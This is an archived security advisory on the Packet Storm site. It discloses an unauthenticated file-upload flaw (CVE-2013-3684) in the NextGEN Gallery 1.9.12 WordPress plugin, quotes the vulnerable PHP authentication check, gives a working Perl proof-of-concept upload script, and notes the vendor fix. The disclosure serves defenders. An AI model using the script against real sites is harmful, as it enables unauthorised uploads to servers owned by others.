Twenty Year Anniversary

NextGEN Gallery 1.9.12 Shell Upload

NextGEN Gallery 1.9.12 Shell Upload
Posted Jun 13, 2013
Authored by Marcos Aguero | Site s21sec.com

The NextGEN Gallery WordPress plugin version 1.9.12 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
advisories | CVE-2013-3684
MD5 | 2f7d89594a1ae75967627c566376341b

NextGEN Gallery 1.9.12 Shell Upload

Change Mirror Download
##############################################################


- S21Sec Advisory -


##############################################################

Title: NextGEN Gallery 1.9.12 Arbitrary File Upload
ID: S21SEC-046-en
CVE ID: CVE-2013-3684
Severity: High
Status: Fixed
History: 27.May.2013 Vulnerability discovered
28.May.2013 Vendor informed
12.Jun.2013 Fix released
Authors: Marcos Agüero (maguero@s21sec.com)
URL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt
Release: Public


[ SUMMARY ]

NextGEN Gallery is a WordPress gallery plugin that offers sophisticated
gallery management and
displays. It's one of the most popular plugins ever produced for
WordPress, currently downloaded
around 30,000 times per week.

[ AFFECTED VERSIONS ]

* NextGEN Gallery 1.9.12

[ DESCRIPTION ]

NextGEN Gallery allows file upload to unauthenticated users. Filters in
place only permits uploads
of image files (extensions .gif, .png and .jpg). This avoids scripts
execution problems but an
attacker could use the affected system to host files.

Vulnerability occurs due an innapropiate cookie validation in
admin/upload.php script:

if (wp_validate_auth_cookie()) {
$results = wp_parse_auth_cookie();
$logged_in = FALSE;
if (isset($results['username']) && isset($results['expiration'])) {
if (time() < floatval($results['expiration'])) {
if (($userdata =
get_userdatabylogin($results['username'])))
$logged_in = $userdata->ID;
}
}

if (!$logged_in) die("Login failure. -1");
else if (!user_can($logged_in, 'NextGEN Upload images')) {
die('You do not have permission to upload files. -2');
}
} # VULN: No auth cookie is okay!

This can be triggered by invoking 'nggupload' parameter on any valid
wordpress URL:

ngggallery.php:

// Handle upload requests
add_action('init', array(&$this, 'handle_upload_request'));

[...]
function handle_upload_request()
{
if (isset($_GET['nggupload'])) {
require_once(implode(DIRECTORY_SEPARATOR, array(
NGGALLERY_ABSPATH,
'admin',
'upload.php'
)));
throw new E_Clean_Exit();
}
}

[ POC ]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [
name => $name,
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}

[ SOLUTION ]

Version 1.9.13 released by vendor.
http://wordpress.org/plugins/nextgen-gallery/

[ REFERENCES ]

* S21Sec
http://www.s21sec.com

--
S21sec

*Marcos Agüero*
/S21sec ACSS/

Tlf: +34 902 222 521

www.s21sec.com <http://www.s21sec.com>, blog.s21sec.com
<http://blog.s21sec.com> securityblog.s21sec.com
<http://securityblog.s21sec.com>

Salvo que se indique lo contrario, esta información es CONFIDENCIAL y
contiene datos de carácter personal que han de ser tratados conforme a
la legislación vigente en materia de protección de datos. Si usted no es
destinatario original de este mensaje, le comunicamos que no está
autorizado a revisar, reenviar, distribuir, copiar o imprimir la
información en él contenida y le rogamos que proceda a borrarlo de sus
sistemas.

Unless contrary indicated, this information is CONFIDENTIAL and contains
personal data that shall be processed according to personal data
protection law in force. If you are not the named addressee of this
message you are hereby notified that any review, dissemination,
distribution, copying or printing of this message is strictly prohibited
and we urge you to delete it from your Systems.

Antes de imprimir este mensaje valora si verdaderamente es necesario. De
esta forma contribuimos a la preservación del Medio Ambiente.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    11 Files
  • 21
    Jul 21st
    1 Files
  • 22
    Jul 22nd
    1 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close